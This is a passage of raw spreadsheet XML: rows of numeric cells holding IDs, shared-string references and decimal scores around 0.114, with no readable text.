        <v>24318</v>
      </c>
      <c r="F26539" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26540" ht="15.75" customHeight="1">
      <c r="A26540" s="1">
        <v>24253.0</v>
      </c>
      <c r="B26540" s="2">
        <v>1.0504958E7</v>
      </c>
      <c r="C26540" s="2" t="s">
        <v>25519</v>
      </c>
      <c r="D26540" s="2">
        <v>1.0</v>
      </c>
      <c r="E26540" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26540" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26541" ht="15.75" customHeight="1">
      <c r="A26541" s="1">
        <v>24897.0</v>
      </c>
      <c r="B26541" s="2">
        <v>1.2288491E7</v>
      </c>
      <c r="C26541" s="2" t="s">
        <v>25520</v>
      </c>
      <c r="D26541" s="2">
        <v>1.0</v>
      </c>
      <c r="E26541" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26541" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26542" ht="15.75" customHeight="1">
      <c r="A26542" s="1">
        <v>25124.0</v>
      </c>
      <c r="B26542" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C26542" s="2" t="s">
        <v>25521</v>
      </c>
      <c r="D26542" s="2">
        <v>1.0</v>
      </c>
      <c r="E26542" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26542" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26543" ht="15.75" customHeight="1">
      <c r="A26543" s="1">
        <v>25229.0</v>
      </c>
      <c r="B26543" s="2">
        <v>1.3342247E7</v>
      </c>
      <c r="C26543" s="2" t="s">
        <v>25522</v>
      </c>
      <c r="D26543" s="2">
        <v>1.0</v>
      </c>
      <c r="E26543" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26543" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26544" ht="15.75" customHeight="1">
      <c r="A26544" s="1">
        <v>25234.0</v>
      </c>
      <c r="B26544" s="2">
        <v>1.3361506E7</v>
      </c>
      <c r="C26544" s="2" t="s">
        <v>25495</v>
      </c>
      <c r="D26544" s="2">
        <v>1.0</v>
      </c>
      <c r="E26544" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26544" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26545" ht="15.75" customHeight="1">
      <c r="A26545" s="1">
        <v>25392.0</v>
      </c>
      <c r="B26545" s="2">
        <v>1.3691735E7</v>
      </c>
      <c r="C26545" s="2" t="s">
        <v>25523</v>
      </c>
      <c r="D26545" s="2">
        <v>1.0</v>
      </c>
      <c r="E26545" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26545" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26546" ht="15.75" customHeight="1">
      <c r="A26546" s="1">
        <v>25456.0</v>
      </c>
      <c r="B26546" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C26546" s="2" t="s">
        <v>25524</v>
      </c>
      <c r="D26546" s="2">
        <v>1.0</v>
      </c>
      <c r="E26546" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26546" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26547" ht="15.75" customHeight="1">
      <c r="A26547" s="1">
        <v>25492.0</v>
      </c>
      <c r="B26547" s="2">
        <v>1.4052619E7</v>
      </c>
      <c r="C26547" s="2" t="s">
        <v>25525</v>
      </c>
      <c r="D26547" s="2">
        <v>1.0</v>
      </c>
      <c r="E26547" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26547" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26548" ht="15.75" customHeight="1">
      <c r="A26548" s="1">
        <v>25618.0</v>
      </c>
      <c r="B26548" s="2">
        <v>1.4410118E7</v>
      </c>
      <c r="C26548" s="2" t="s">
        <v>25526</v>
      </c>
      <c r="D26548" s="2">
        <v>1.0</v>
      </c>
      <c r="E26548" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26548" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26549" ht="15.75" customHeight="1">
      <c r="A26549" s="1">
        <v>26179.0</v>
      </c>
      <c r="B26549" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C26549" s="2" t="s">
        <v>25527</v>
      </c>
      <c r="D26549" s="2">
        <v>1.0</v>
      </c>
      <c r="E26549" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26549" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26550" ht="15.75" customHeight="1">
      <c r="A26550" s="1">
        <v>26313.0</v>
      </c>
      <c r="B26550" s="2">
        <v>1.664865E7</v>
      </c>
      <c r="C26550" s="2" t="s">
        <v>25498</v>
      </c>
      <c r="D26550" s="2">
        <v>1.0</v>
      </c>
      <c r="E26550" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26550" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26551" ht="15.75" customHeight="1">
      <c r="A26551" s="1">
        <v>26638.0</v>
      </c>
      <c r="B26551" s="2">
        <v>1.8046118E7</v>
      </c>
      <c r="C26551" s="2" t="s">
        <v>25528</v>
      </c>
      <c r="D26551" s="2">
        <v>1.0</v>
      </c>
      <c r="E26551" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26551" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26552" ht="15.75" customHeight="1">
      <c r="A26552" s="1">
        <v>26996.0</v>
      </c>
      <c r="B26552" s="2">
        <v>1.9844204E7</v>
      </c>
      <c r="C26552" s="2" t="s">
        <v>25529</v>
      </c>
      <c r="D26552" s="2">
        <v>1.0</v>
      </c>
      <c r="E26552" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26552" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26553" ht="15.75" customHeight="1">
      <c r="A26553" s="1">
        <v>27082.0</v>
      </c>
      <c r="B26553" s="2">
        <v>2.0483762E7</v>
      </c>
      <c r="C26553" s="2" t="s">
        <v>25530</v>
      </c>
      <c r="D26553" s="2">
        <v>1.0</v>
      </c>
      <c r="E26553" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26553" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26554" ht="15.75" customHeight="1">
      <c r="A26554" s="1">
        <v>27172.0</v>
      </c>
      <c r="B26554" s="2">
        <v>2.0852327E7</v>
      </c>
      <c r="C26554" s="2" t="s">
        <v>25531</v>
      </c>
      <c r="D26554" s="2">
        <v>1.0</v>
      </c>
      <c r="E26554" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26554" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26555" ht="15.75" customHeight="1">
      <c r="A26555" s="1">
        <v>27553.0</v>
      </c>
      <c r="B26555" s="2">
        <v>2.2394442E7</v>
      </c>
      <c r="C26555" s="2" t="s">
        <v>25532</v>
      </c>
      <c r="D26555" s="2">
        <v>1.0</v>
      </c>
      <c r="E26555" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26555" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26556" ht="15.75" customHeight="1">
      <c r="A26556" s="1">
        <v>28038.0</v>
      </c>
      <c r="B26556" s="2">
        <v>2.4481604E7</v>
      </c>
      <c r="C26556" s="2" t="s">
        <v>25533</v>
      </c>
      <c r="D26556" s="2">
        <v>1.0</v>
      </c>
      <c r="E26556" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26556" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26557" ht="15.75" customHeight="1">
      <c r="A26557" s="1">
        <v>28255.0</v>
      </c>
      <c r="B26557" s="2">
        <v>2.5341528E7</v>
      </c>
      <c r="C26557" s="2" t="s">
        <v>25534</v>
      </c>
      <c r="D26557" s="2">
        <v>1.0</v>
      </c>
      <c r="E26557" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26557" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26558" ht="15.75" customHeight="1">
      <c r="A26558" s="1">
        <v>28289.0</v>
      </c>
      <c r="B26558" s="2">
        <v>2.5534495E7</v>
      </c>
      <c r="C26558" s="2" t="s">
        <v>25535</v>
      </c>
      <c r="D26558" s="2">
        <v>1.0</v>
      </c>
      <c r="E26558" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26558" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26559" ht="15.75" customHeight="1">
      <c r="A26559" s="1">
        <v>28623.0</v>
      </c>
      <c r="B26559" s="2">
        <v>2.7165628E7</v>
      </c>
      <c r="C26559" s="2" t="s">
        <v>25536</v>
      </c>
      <c r="D26559" s="2">
        <v>1.0</v>
      </c>
      <c r="E26559" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26559" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26560" ht="15.75" customHeight="1">
      <c r="A26560" s="1">
        <v>29207.0</v>
      </c>
      <c r="B26560" s="2">
        <v>3.0778497E7</v>
      </c>
      <c r="C26560" s="2" t="s">
        <v>25537</v>
      </c>
      <c r="D26560" s="2">
        <v>1.0</v>
      </c>
      <c r="E26560" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26560" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26561" ht="15.75" customHeight="1">
      <c r="A26561" s="1">
        <v>29749.0</v>
      </c>
      <c r="B26561" s="2">
        <v>3.4740796E7</v>
      </c>
      <c r="C26561" s="2" t="s">
        <v>25538</v>
      </c>
      <c r="D26561" s="2">
        <v>1.0</v>
      </c>
      <c r="E26561" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26561" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26562" ht="15.75" customHeight="1">
      <c r="A26562" s="1">
        <v>30687.0</v>
      </c>
      <c r="B26562" s="2">
        <v>4.2531297E7</v>
      </c>
      <c r="C26562" s="2" t="s">
        <v>25539</v>
      </c>
      <c r="D26562" s="2">
        <v>1.0</v>
      </c>
      <c r="E26562" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26562" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26563" ht="15.75" customHeight="1">
      <c r="A26563" s="1">
        <v>30894.0</v>
      </c>
      <c r="B26563" s="2">
        <v>4.6578165E7</v>
      </c>
      <c r="C26563" s="2" t="s">
        <v>25540</v>
      </c>
      <c r="D26563" s="2">
        <v>1.0</v>
      </c>
      <c r="E26563" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26563" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26564" ht="15.75" customHeight="1">
      <c r="A26564" s="1">
        <v>30992.0</v>
      </c>
      <c r="B26564" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C26564" s="2" t="s">
        <v>25541</v>
      </c>
      <c r="D26564" s="2">
        <v>1.0</v>
      </c>
      <c r="E26564" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26564" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26565" ht="15.75" customHeight="1">
      <c r="A26565" s="1">
        <v>31385.0</v>
      </c>
      <c r="B26565" s="2">
        <v>4998051.0</v>
      </c>
      <c r="C26565" s="2" t="s">
        <v>25542</v>
      </c>
      <c r="D26565" s="2">
        <v>1.0</v>
      </c>
      <c r="E26565" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26565" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26566" ht="15.75" customHeight="1">
      <c r="A26566" s="1">
        <v>31863.0</v>
      </c>
      <c r="B26566" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C26566" s="2" t="s">
        <v>25543</v>
      </c>
      <c r="D26566" s="2">
        <v>1.0</v>
      </c>
      <c r="E26566" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26566" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26567" ht="15.75" customHeight="1">
      <c r="A26567" s="1">
        <v>32002.0</v>
      </c>
      <c r="B26567" s="2">
        <v>5342496.0</v>
      </c>
      <c r="C26567" s="2" t="s">
        <v>25544</v>
      </c>
      <c r="D26567" s="2">
        <v>1.0</v>
      </c>
      <c r="E26567" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26567" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26568" ht="15.75" customHeight="1">
      <c r="A26568" s="1">
        <v>32047.0</v>
      </c>
      <c r="B26568" s="2">
        <v>5370131.0</v>
      </c>
      <c r="C26568" s="2" t="s">
        <v>25545</v>
      </c>
      <c r="D26568" s="2">
        <v>1.0</v>
      </c>
      <c r="E26568" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26568" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26569" ht="15.75" customHeight="1">
      <c r="A26569" s="1">
        <v>32222.0</v>
      </c>
      <c r="B26569" s="2">
        <v>5488862.0</v>
      </c>
      <c r="C26569" s="2" t="s">
        <v>25546</v>
      </c>
      <c r="D26569" s="2">
        <v>1.0</v>
      </c>
      <c r="E26569" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26569" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26570" ht="15.75" customHeight="1">
      <c r="A26570" s="1">
        <v>32305.0</v>
      </c>
      <c r="B26570" s="2">
        <v>5.5588185E7</v>
      </c>
      <c r="C26570" s="2" t="s">
        <v>25514</v>
      </c>
      <c r="D26570" s="2">
        <v>1.0</v>
      </c>
      <c r="E26570" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26570" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26571" ht="15.75" customHeight="1">
      <c r="A26571" s="1">
        <v>32355.0</v>
      </c>
      <c r="B26571" s="2">
        <v>5.5939907E7</v>
      </c>
      <c r="C26571" s="2" t="s">
        <v>25547</v>
      </c>
      <c r="D26571" s="2">
        <v>1.0</v>
      </c>
      <c r="E26571" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26571" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26572" ht="15.75" customHeight="1">
      <c r="A26572" s="1">
        <v>32540.0</v>
      </c>
      <c r="B26572" s="2">
        <v>5739951.0</v>
      </c>
      <c r="C26572" s="2" t="s">
        <v>25548</v>
      </c>
      <c r="D26572" s="2">
        <v>1.0</v>
      </c>
      <c r="E26572" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26572" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26573" ht="15.75" customHeight="1">
      <c r="A26573" s="1">
        <v>32893.0</v>
      </c>
      <c r="B26573" s="2">
        <v>6389033.0</v>
      </c>
      <c r="C26573" s="2" t="s">
        <v>25549</v>
      </c>
      <c r="D26573" s="2">
        <v>1.0</v>
      </c>
      <c r="E26573" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26573" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26574" ht="15.75" customHeight="1">
      <c r="A26574" s="1">
        <v>32907.0</v>
      </c>
      <c r="B26574" s="2">
        <v>6396181.0</v>
      </c>
      <c r="C26574" s="2" t="s">
        <v>25550</v>
      </c>
      <c r="D26574" s="2">
        <v>1.0</v>
      </c>
      <c r="E26574" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26574" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26575" ht="15.75" customHeight="1">
      <c r="A26575" s="1">
        <v>32909.0</v>
      </c>
      <c r="B26575" s="2">
        <v>6404000.0</v>
      </c>
      <c r="C26575" s="2" t="s">
        <v>25525</v>
      </c>
      <c r="D26575" s="2">
        <v>1.0</v>
      </c>
      <c r="E26575" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26575" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26576" ht="15.75" customHeight="1">
      <c r="A26576" s="1">
        <v>32953.0</v>
      </c>
      <c r="B26576" s="2">
        <v>6489156.0</v>
      </c>
      <c r="C26576" s="2" t="s">
        <v>25551</v>
      </c>
      <c r="D26576" s="2">
        <v>1.0</v>
      </c>
      <c r="E26576" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26576" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26577" ht="15.75" customHeight="1">
      <c r="A26577" s="1">
        <v>33029.0</v>
      </c>
      <c r="B26577" s="2">
        <v>6688390.0</v>
      </c>
      <c r="C26577" s="2" t="s">
        <v>25552</v>
      </c>
      <c r="D26577" s="2">
        <v>1.0</v>
      </c>
      <c r="E26577" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26577" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26578" ht="15.75" customHeight="1">
      <c r="A26578" s="1">
        <v>33061.0</v>
      </c>
      <c r="B26578" s="2">
        <v>6826175.0</v>
      </c>
      <c r="C26578" s="2" t="s">
        <v>25553</v>
      </c>
      <c r="D26578" s="2">
        <v>1.0</v>
      </c>
      <c r="E26578" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26578" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26579" ht="15.75" customHeight="1">
      <c r="A26579" s="1">
        <v>33390.0</v>
      </c>
      <c r="B26579" s="2">
        <v>7686751.0</v>
      </c>
      <c r="C26579" s="2" t="s">
        <v>25554</v>
      </c>
      <c r="D26579" s="2">
        <v>1.0</v>
      </c>
      <c r="E26579" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26579" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26580" ht="15.75" customHeight="1">
      <c r="A26580" s="1">
        <v>33557.0</v>
      </c>
      <c r="B26580" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C26580" s="2" t="s">
        <v>25516</v>
      </c>
      <c r="D26580" s="2">
        <v>1.0</v>
      </c>
      <c r="E26580" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26580" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26581" ht="15.75" customHeight="1">
      <c r="A26581" s="1">
        <v>33766.0</v>
      </c>
      <c r="B26581" s="2">
        <v>8641254.0</v>
      </c>
      <c r="C26581" s="2" t="s">
        <v>25518</v>
      </c>
      <c r="D26581" s="2">
        <v>1.0</v>
      </c>
      <c r="E26581" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26581" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26582" ht="15.75" customHeight="1">
      <c r="A26582" s="1">
        <v>34054.0</v>
      </c>
      <c r="B26582" s="2">
        <v>9595617.0</v>
      </c>
      <c r="C26582" s="2" t="s">
        <v>25555</v>
      </c>
      <c r="D26582" s="2">
        <v>1.0</v>
      </c>
      <c r="E26582" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26582" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26583" ht="15.75" customHeight="1">
      <c r="A26583" s="1">
        <v>34259.0</v>
      </c>
      <c r="B26583" s="2">
        <v>8042241.0</v>
      </c>
      <c r="C26583" s="2" t="s">
        <v>25556</v>
      </c>
      <c r="D26583" s="2">
        <v>1.0</v>
      </c>
      <c r="E26583" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26583" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26584" ht="15.75" customHeight="1">
      <c r="A26584" s="1">
        <v>34263.0</v>
      </c>
      <c r="B26584" s="2">
        <v>8045547.0</v>
      </c>
      <c r="C26584" s="2" t="s">
        <v>25557</v>
      </c>
      <c r="D26584" s="2">
        <v>1.0</v>
      </c>
      <c r="E26584" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26584" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26585" ht="15.75" customHeight="1">
      <c r="A26585" s="1">
        <v>2217.0</v>
      </c>
      <c r="B26585" s="2">
        <v>3.2142714E7</v>
      </c>
      <c r="C26585" s="2" t="s">
        <v>25558</v>
      </c>
      <c r="D26585" s="2">
        <v>1.0</v>
      </c>
      <c r="E26585" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26585" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="26586" ht="15.75" customHeight="1">
      <c r="A26586" s="1">
        <v>10484.0</v>
      </c>
      <c r="B26586" s="2">
        <v>1.0989418E7</v>
      </c>
      <c r="C26586" s="2" t="s">
        <v>25559</v>
      </c>
      <c r="D26586" s="2">
        <v>1.0</v>
      </c>
      <c r="E26586" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26586" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="26587" ht="15.75" customHeight="1">
      <c r="A26587" s="1">
        <v>13963.0</v>
      </c>
      <c r="B26587" s="2">
        <v>3.7309613E7</v>
      </c>
      <c r="C26587" s="2" t="s">
        <v>25560</v>
      </c>
      <c r="D26587" s="2">
        <v>1.0</v>
      </c>
      <c r="E26587" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26587" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="26588" ht="15.75" customHeight="1">
      <c r="A26588" s="1">
        <v>23763.0</v>
      </c>
      <c r="B26588" s="2">
        <v>7523177.0</v>
      </c>
      <c r="C26588" s="2" t="s">
        <v>25561</v>
      </c>
      <c r="D26588" s="2">
        <v>1.0</v>
      </c>
      <c r="E26588" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26588" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="26589" ht="15.75" customHeight="1">
      <c r="A26589" s="1">
        <v>12412.0</v>
      </c>
      <c r="B26589" s="2">
        <v>2.9081972E7</v>
      </c>
      <c r="C26589" s="2" t="s">
        <v>25562</v>
      </c>
      <c r="D26589" s="2">
        <v>1.0</v>
      </c>
      <c r="E26589" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26589" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="26590" ht="15.75" customHeight="1">
      <c r="A26590" s="1">
        <v>17543.0</v>
      </c>
      <c r="B26590" s="2">
        <v>5.0144852E7</v>
      </c>
      <c r="C26590" s="2" t="s">
        <v>25563</v>
      </c>
      <c r="D26590" s="2">
        <v>1.0</v>
      </c>
      <c r="E26590" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26590" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="26591" ht="15.75" customHeight="1">
      <c r="A26591" s="1">
        <v>18871.0</v>
      </c>
      <c r="B26591" s="2">
        <v>5.4053276E7</v>
      </c>
      <c r="C26591" s="2" t="s">
        <v>25564</v>
      </c>
      <c r="D26591" s="2">
        <v>1.0</v>
      </c>
      <c r="E26591" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26591" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="26592" ht="15.75" customHeight="1">
      <c r="A26592" s="1">
        <v>26201.0</v>
      </c>
      <c r="B26592" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C26592" s="2" t="s">
        <v>25565</v>
      </c>
      <c r="D26592" s="2">
        <v>1.0</v>
      </c>
      <c r="E26592" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26592" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="26593" ht="15.75" customHeight="1">
      <c r="A26593" s="1">
        <v>30075.0</v>
      </c>
      <c r="B26593" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C26593" s="2" t="s">
        <v>25566</v>
      </c>
      <c r="D26593" s="2">
        <v>1.0</v>
      </c>
      <c r="E26593" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26593" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="26594" ht="15.75" customHeight="1">
      <c r="A26594" s="1">
        <v>2819.0</v>
      </c>
      <c r="B26594" s="2">
        <v>3.5386895E7</v>
      </c>
      <c r="C26594" s="2" t="s">
        <v>25567</v>
      </c>
      <c r="D26594" s="2">
        <v>1.0</v>
      </c>
      <c r="E26594" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26594" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="26595" ht="15.75" customHeight="1">
      <c r="A26595" s="1">
        <v>8149.0</v>
      </c>
      <c r="B26595" s="2">
        <v>5.3171446E7</v>
      </c>
      <c r="C26595" s="2" t="s">
        <v>25568</v>
      </c>
      <c r="D26595" s="2">
        <v>1.0</v>
      </c>
      <c r="E26595" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26595" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="26596" ht="15.75" customHeight="1">
      <c r="A26596" s="1">
        <v>11566.0</v>
      </c>
      <c r="B26596" s="2">
        <v>2.2760321E7</v>
      </c>
      <c r="C26596" s="2" t="s">
        <v>25569</v>
      </c>
      <c r="D26596" s="2">
        <v>1.0</v>
      </c>
      <c r="E26596" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26596" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="26597" ht="15.75" customHeight="1">
      <c r="A26597" s="1">
        <v>17845.0</v>
      </c>
      <c r="B26597" s="2">
        <v>5.0951189E7</v>
      </c>
      <c r="C26597" s="2" t="s">
        <v>25570</v>
      </c>
      <c r="D26597" s="2">
        <v>1.0</v>
      </c>
      <c r="E26597" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26597" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="26598" ht="15.75" customHeight="1">
      <c r="A26598" s="1">
        <v>25896.0</v>
      </c>
      <c r="B26598" s="2">
        <v>1.5007927E7</v>
      </c>
      <c r="C26598" s="2" t="s">
        <v>25571</v>
      </c>
      <c r="D26598" s="2">
        <v>1.0</v>
      </c>
      <c r="E26598" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26598" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="26599" ht="15.75" customHeight="1">
      <c r="A26599" s="1">
        <v>8560.0</v>
      </c>
      <c r="B26599" s="2">
        <v>5.4174058E7</v>
      </c>
      <c r="C26599" s="2" t="s">
        <v>25572</v>
      </c>
      <c r="D26599" s="2">
        <v>1.0</v>
      </c>
      <c r="E26599" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26599" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="26600" ht="15.75" customHeight="1">
      <c r="A26600" s="1">
        <v>21314.0</v>
      </c>
      <c r="B26600" s="2">
        <v>2.0852328E7</v>
      </c>
      <c r="C26600" s="2" t="s">
        <v>25573</v>
      </c>
      <c r="D26600" s="2">
        <v>1.0</v>
      </c>
      <c r="E26600" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26600" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="26601" ht="15.75" customHeight="1">
      <c r="A26601" s="1">
        <v>25499.0</v>
      </c>
      <c r="B26601" s="2">
        <v>1.411972E7</v>
      </c>
      <c r="C26601" s="2" t="s">
        <v>25574</v>
      </c>
      <c r="D26601" s="2">
        <v>1.0</v>
      </c>
      <c r="E26601" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26601" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="26602" ht="15.75" customHeight="1">
      <c r="A26602" s="1">
        <v>27803.0</v>
      </c>
      <c r="B26602" s="2">
        <v>2.3235125E7</v>
      </c>
      <c r="C26602" s="2" t="s">
        <v>25575</v>
      </c>
      <c r="D26602" s="2">
        <v>1.0</v>
      </c>
      <c r="E26602" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26602" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="26603" ht="15.75" customHeight="1">
      <c r="A26603" s="1">
        <v>31363.0</v>
      </c>
      <c r="B26603" s="2">
        <v>4.9882237E7</v>
      </c>
      <c r="C26603" s="2" t="s">
        <v>25576</v>
      </c>
      <c r="D26603" s="2">
        <v>1.0</v>
      </c>
      <c r="E26603" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26603" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="26604" ht="15.75" customHeight="1">
      <c r="A26604" s="1">
        <v>15744.0</v>
      </c>
      <c r="B26604" s="2">
        <v>4.41174E7</v>
      </c>
      <c r="C26604" s="2" t="s">
        <v>25577</v>
      </c>
      <c r="D26604" s="2">
        <v>1.0</v>
      </c>
      <c r="E26604" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26604" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="26605" ht="15.75" customHeight="1">
      <c r="A26605" s="1">
        <v>21657.0</v>
      </c>
      <c r="B26605" s="2">
        <v>2.4950036E7</v>
      </c>
      <c r="C26605" s="2" t="s">
        <v>25578</v>
      </c>
      <c r="D26605" s="2">
        <v>1.0</v>
      </c>
      <c r="E26605" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26605" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="26606" ht="15.75" customHeight="1">
      <c r="A26606" s="1">
        <v>24686.0</v>
      </c>
      <c r="B26606" s="2">
        <v>1.1611369E7</v>
      </c>
      <c r="C26606" s="2" t="s">
        <v>25579</v>
      </c>
      <c r="D26606" s="2">
        <v>1.0</v>
      </c>
      <c r="E26606" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26606" s="2">
